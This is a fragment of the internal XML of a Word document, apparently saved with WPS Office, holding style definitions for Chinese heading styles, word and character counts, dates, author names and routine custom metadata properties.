      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="7"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="3"/>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1052</Words>
  <Characters>2227</Characters>
  <Lines>57</Lines>
  <Paragraphs>16</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2390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2024-09-05T08:33:00Z</dcterms:created>
  <dc:creator>Microsoft Office User</dc:creator>
  <cp:lastModifiedBy>我是一颗小白菜</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-30T06:39:07Z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eyJoZGlkIjoiN2YzNjBkOTgyNWQ1YTMxYzM3MzMwNWFiODNmOWIzYWMiLCJ1c2VySWQiOiIxNjE2NTYxNzU1In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.20305</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>8B1C17A0C8D44A5888D807DC8D7BCE88_12</vt:lpwstr>
  </property>
</Properties>
</file>